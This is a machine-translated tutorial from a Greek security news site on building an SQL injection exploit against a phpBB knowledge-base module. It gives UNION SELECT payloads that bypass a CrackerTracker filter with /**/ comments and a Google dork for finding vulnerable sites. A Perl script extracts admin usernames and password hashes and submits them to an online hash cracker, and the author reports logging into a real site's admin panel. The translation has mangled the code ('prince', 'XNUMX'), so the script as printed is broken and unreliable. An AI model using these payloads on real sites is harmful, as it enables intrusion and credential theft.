The Weather Channel Global Weather Channel was attacked by ransomware
infosec

The Weather Channel Global Weather Channel was attacked by ransomware

The Weather Channel Global Weather Channel was attacked by ransomware resulting in the live broadcast being interrupted for about 90 minutes ....
Read More
infosec

A "hero" that stopped WannaCry is guilty of other criminal acts

A British computer security researcher was once described as a "hero" after helping to prevent a devastating explosion of WannaCry ransomware and ...
Read More
infosec

Hacker stole 150 thousands of rubles from Belarusian business accounts

Early in April, an employee of a metropolitan organization reported to the police that an unknown person had made unauthorized access ...
Read More
infosec

Banning links from embedded browsers for security reasons

Google has decided to ban the logins from embedded browsers since June of 2019. Why did he ...
Read More
infosec

Malicious AutoHotkey Scripts infect systems for spyware purposes

A new threat appears to have occurred, in which malicious hackers use AutoHotkey scripts to ...
Read More
Latest Posts

How do hackers create their exploits?

Surely most of us have seen hacker movies. Films where the protagonist-hacker sitting in his chair and surrounded by 3 and 4 monitors passionately writes inadvertent things on the keyboard and tries to access secrets. Having written many lines of code (something that looks like a code) and <...>

after pressing enter and backspace, manages to invade the system that is "fighting" so much so. As usual as usual .. on-screen ...

Some believe that a real hacker would not use when and when a ready-made program invades a remote computer. This, of course, as we have said many times in the past, is not absolute. A hacker could write an automated routine that he could exploit to make him snap (so to speak) of his search and relieve him of unnecessary fatigue. Of course, using a ready-made program has become taboo since it is considered by the critical majority of "do it manually" as a kiddie script. And this delicate point is where ALL of us should understand.

There are no standard practices, techniques, and logic that are used by so-called hackers. Everything is highly acceptable if through them the primary purpose of search and research is clearly the knowledge! In this article we will try to outline some techniques that a hacker would use to gain access to a removable system (with Administrator always) that he had put in the eye for a long time. Do not forget that this system could be your own you ... and you are uncomfortable to admire it while ... while the nights undisturbed by the invaders.

Let's talk about exploits.

Exploit for those who do not know is a piece of executable code (small areas usually), or a sequence of commands that exploit one software bug, (a malfunction or vulnerability to existing software) to force the software to an abnormal process, such as viewing the users' username and password information of a database user.

The exploits are usually classified according to the criteria:

  • The type of Vulnerability they exploit
  • The place where they will run, that is, if the application and run on the same computer (local) or to a remote machine (remote). When a exploit is applied locally, it results in an increase in the rights of the person performing it. When a exploit runs remotely, it exploits the remote system's vulnerability without requiring any prior access to the system.
  • The result of the attacker's execution of the exploit (eg EoP, DOS, spoofing, Sql injection)

We will study the stages of a "exploitation" of a exploit, from the moment of finding the bug up to the moment when the executable code was created and implemented.

The process :

  • Find a security blank. In the event that this security gap is not published in the internt is designated as 0day (zero day). Usually 0days are released on the Internet before creating a patch to neutralize the security gap they exploit. This name is based on the fact that security officers are not even aware of the existence of this security vulnerability until the exploit is released.
  • Discovery of a Dork to find multiple vulnerable pages that have exactly the same security gap and their exploitation is the same!
  • Writing exploit which will automati - cally exploit the bug that has been discovered and deliver the effects of the attack in a very short time;

For more information on exploits and Vulnerabilities:

Some sites with Databases full of Exploits:

From theory to practice.
In the first instance, we will see how a hacker would create a exploit based on a previously known BUG.
For example, we will use the bug found in "/kb.php?mode=cat&cat= '"The particular security gap lies in the fact that php script does not filter the data we give it, so it displays various elements of the database that a visitor should clearly not see. But let's take things in turn.

Find and use BUG.
If we enter something like "http://www.site.gr/kb.php?mode=cat&cat=’"And if the server we are addressing has indeed the Bug we are referring to will answer us:

Could not get category data

DEBUG MODE

SQL Error: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 3

SELECT * FROM phpbb_kb_categories WHERE class_id = '

Line: 134
File: functions_kb.php

Image 1
The first signs of a problematic version of PHPbb are obvious. But how much they will allow us to enter the system, is at the moment a puzzle!

We know from the beginning of the already known bug that the table with username and passwords for this version of PHPbb is called phpbb_users and the columns are username, user_passwords. Naturally and not knowing them would not mind us especially. If we just had to do Dump the database and find more table corresponds to username and password.

ATTENTION: A typical SQL attack on the site could have been like this:

http://www.site.gr/kb.php?mode=cat&cat=-99999 union select 0,1,2,3,4,5 from phpbb_users where user_id=2

but the result unfortunately for us would not be as pleasant as the application CBACK CrackerTracker v4:

- SECURITY ALERT -

The Board Security System has detected that you wanted to bring bad
Code to this Forum or you have tried to exploit something here or maybe
another attack like this.

This attempt was blocked and we logged all the information about this.

If you see this message after including a new MOD to your Forum or if
you have reached this site over a normal Forum Link, please contact
the Board Administrator to fix this Problem.

Image 2
Oh no! We were stunned!

The application of CBACK CrackerTracker v4 has shown that it is active and has "tugged", so we should look for another way to get into the system database. Maybe we were looking for one backdoor.

If you have the impression that our Site Administrator has stuck to the wall then you probably have not heard the trick with "/ ** /"Which you use primarily for SQL injection attacks. Probably we discovered the backdoor of the system. For those who do not know exactly what "is" and "does" the CBACK CrackerTracker application can visit σελίδα. The site that showed us a security alert on:

http://www.site.gr/kb.php?mode=cat&cat=-99999 union select 0,1,2,3,4,5 from phpbb_users where user_id=2

We will replace where there is a void with "/ ** /"So that, after this process, url will be converted to:

http://www.site.gr/kb.php?mode=cat&cat=-99999/**/union/**/select/**/0,1,2,3,4,5/**/from/**/phpbb_users/**/where/**/user_id=2

And yes .. we did not find our security system. You see CBACK CrackerTracker does not manage to "understand" the "/ ** /"As dangerous, while the gaps identify them as violent attacks.

If you are wondering how we managed to find the columns that the url has, the answer lies in front of your eyes. You can work, either manually or automatically. In both cases, the process is the same. As long as the page response is:

SQL Error: 1222 The used SELECT statements have a different number of columns

we add another column .. until we find the final number of columns.

Now we will try to import the data "username","user_passwords".

http://www.site.gr/kb.php?mode=cat&cat=-99999/**/union/**/select/**/0,1,2,3,concat(username,0x3a,user_password),5/**/from/**/phpbb_users/**/where/**/user_id=2

Image 3
Eventually we managed to bypass the implementation of CBACK CrackerTracker v4

So, with joy and ease, sever with our SQL injection detection system showed us the username and password of the user with user_id = 2.

Discovering Dork's exploit.
In order to find the Dork that responds to this particular security gap, it must have "inside" the basic features of the Vulnerabale Script on the page. So we put Google to search in Url each site if there is "kb.php? mode = cat". The complete Dork format in Google language will be "inurl: kb.php? mode = cat"

Creating our exploit.
A code that will take advantage of the "kb.php? mode = cat & cat ="Is the following:

01
#! / usr / bin / perl
02
use
strictly;
03
use
HTTP :: Request :: Common;
04
use
LWP :: UserAgent;
05
use
IO ::
socket
;
06
07
prince
"\ n \ n [*] Exploit [kb.php? mode = cat] \ n"
;
08
prince
"[*] Written by mr.pr0n \ n"
;
09
prince
"[*] Dork: allinurl: kb.php? Mode = cat \ n"
;
10
11
prince
"\ nEnter Host:"
;
12
chop
(
my
$ kb
= <STDIN>);
13
prince
"User Id Number [> = 2]:"
;
14
chop
(
my
$ usid

= <STDIN>);
15
my
$ xploit
=  
"/kb.php?mode=cat&cat=-XNUMX/**/union/**/select/**/XNUMX,database(),XNUMX,concat(XNUMXxXNUMXfXNUMXcXNUMXbXNUMXxXNUMXa,username,XNUMXxXNUMXa,user_password,XNUMXxXNUMXa,XNUMXxXNUMXfXNUMXcXNUMXbXNUMX),XNUMX/**/from/**/phpbb_users/**/where/**/user_id="
;
16
17
####### Xploiting #########
18
prince
"[+] Exloiting ... \ n"
;
19
my
$ lwp
= LWP :: UserAgent-> new () or 
that
;
20
my
$ check
=
$ lwp
-> get (
$ kb
.
$ xploit
.
$ usid
);
21
if
(
$ check
-> content = ~ m / totalxaker: (. *): (. *): totalxaker / g)
22
{
23
        
(
$ username
) = 
$1
;
24
        
my
(
$ hash
) = 
$2
;
25
        
prince
"[+] Yeah, its Vulnerable !! \ n"
;
26
        
prince
"-> Username: $ username \ n"
;
27
        
prince
"[MD5 Password: $ hash] \ n"
;
28
29
        
####### Cracking #########
31
        
prince
"[+] The MD5 password ..."
;
32
        
my
$ lwp
= LWP :: UserAgent-> new ();
33
        
my
$ request
=  
$ lwp
-> post (
$ url
, [
"H1"
=> 
$ hash
,  
"Onclick"
=> 
"Search"
]);
34
        
my
$ insidepro
=  
$ request
-> content ();
35
        
if
(
$ insidepro
= ~ m / <\ / script>
$ hash
: <font color =
"Blue"
> (. *) <\ / font> <br> <br> / g)
36
        
{
37
                
prince
"CRACKED !!! \ n"
;
38
                
prince
"---> Password: $ 1 \ n"
;
39
        
}
40
        
else
41
        
{
42
                
prince
"not found! \ n"
;
43
        
}
44
}
45
else
46
{
47
        
prince
"[-] Exploit failed! \ N"
;
48
        
prince
"---> Maybe NOT vulnerable! \ N"
;
49
}
50
prince
"------------------------------- \ n"
;

Lines 1-6
In the first - first line we define the interprinter that is no other than the program!! / Usr / bin / perl (for * nix! Systems) In the following lines we declare the modules that our program will use when executing this HTTP :: Request :: Common for what applications are made in the http protocol while the LWP :: UserAgent simulates the browser application that makes the program as if it were from a regular browser.

Lines 7-10
Here are a few introductory elements of the program and its author as well as a reference to Dork that the user can use to identify several pages that are Vulnerable in this Bug so exploitable by the program we created and present to you .

Lines 11-16
The program then "asks" the user to enter a site of the format http://www.site.gr which is then referred to as the "$ kb". Then the user is asked once again (and last!) To enter a data into the program, which is no more than the User_Id of the user who wants to check. User_Id is listed as $ usid and "keeps" in the memory of the program for the sequel $ xploit the entire exploit line is entered

/kb.php?mode=cat&cat=-XNUMX/**/union/**/select/**/XNUMX,database(),XNUMX,concat(XNUMXxXNUMXfXNUMXcXNUMXbXNUMXxXNUMXa,username,XNUMXxXNUMXa,user_password,XNUMXxXNUMXa,XNUMXxXNUMXfXNUMXcXNUMXbXNUMX),XNUMX/**/from/**/phpbb_users/**/where/**/user_id=

used earlier to display the username and the password (in hash) of the user with user_id 2.

Lines 17-21
The attack has just begun, since we have created conditions to emulate a real browser connection through the program, creating an integrated form of the exploit that accepts the variable $ check = $ lwp-> get ($ kb. $ xploit. $ usid). Next items that were imported by the user along with the exploit are listed in $ check in the form $ kb. $ xploit. $ usid. The site name is imported as a variable $ kb and user_id with the name of the variable $ usid respectively. Then there are a few "junctions" on whether there are data set as keywords on the 21 line.

Lines 22-28
If all goes hopefully and the site is actually vulnerable to the particular bug then 2 will be "new" data $ username and $ hash which will retrieve the items found in the 21 line search. Then the following lines will be followed by the recording of the data on the desktop.

Lines 29-44
Because "unfortunately" for us the password that is displayed is in hash format, we should insert a built-in Hash Cracker into our program. We will look for the hash we found at http: //hash.insidepro.com. we are going to have to simulate some of the moves we would make on the site through the program. To do this we need to find the exact names of the site buttons as well as the text fields so that we can enter correctly,and as it should). When this is done (and if done properly) our program will cause the site to search for the hash given in its database and the result to appear in the form of the variable $1 as a result of the "break"

Lines 45-50
If you can not find the hash in the hash.insidepro.com database, then just register the "not found!" If you can not find the hash to find username / hash then [-] Exploit failed! on the desktop.

Run the exploit
If everything runs smoothly then logically during exploit, as a result you will get the following.


Image 4
Our exploit works perfectly.

Once we have obtained the username and password of the user with user_id = 2. Once we have cracked the password hash, let's see if that account is in effect. And if we eventually got rid of the city or wasting our time, your time and lots of gray stuff!

Image 5
NO. They do not laugh at you. What you see is indeed an Administrator Panel and we / you Administrators. Do not forget the basic rule of the Hackers, I DO NOT PERFECT anything I do not own !!!

And yes .. we enjoyed it through the administrator panel of the site. Which site do not forget that it also had protection from the SQL injection attacks. Ultimately nothing is Unhackable ε?

Locking the Kerkport.

A better and more secure solution to avoid unpleasant intrusions into your system is to update the existing version of PHPBB you have so that it will temporarily prohibit the adventurous intruders who would so much want to invade your system and hurt your files !! Of course, an update should not be complaining to you because it is not a measure to suppress the attacks, it just gives your system more chances to stay unscathed by attacks. It would be good to search the internet for exploits of your version and to perform controlled attacks on your site so you can be sure you know the potential security loopholes that you have and prevent them ... before the attackers find them and put a shell within the site.

Writing the epilogue
Each key has a handle. Each security system has a small and forgotten back door from which the intruders might well be able to snap in and transform into the System Administrator. The site administrators in which our experiments were conducted clearly did not know about this security gap, so we hope to find it and insure it now. At this point, we would like to assure the site's responsible that we have never hacked a file or some data from the site that hosted our experiments. But no one should forget that all the tools and ways of penetration that we present in the articles of the magazine should not be used in any way with a view to destruction and demonstration but to creation and knowledge! Every disastrous or fanatical (in each sector) energy, apart from the fact that it characterizes middle and immature people (regardless of age), finds us vertically opposed!

Source: http://ghostinthelab.wordpress.com

Do you have an opinion? Leave your comment.

The author allows you to copy his / her text only if you report the source (SecNews.gr), as an e-mail address (Live URL) of the article.
Updated on by

Reader Interactions

Leave a reply

Your email address is not published. Τα υποχρεωτικά πεδία σημειώνονται με *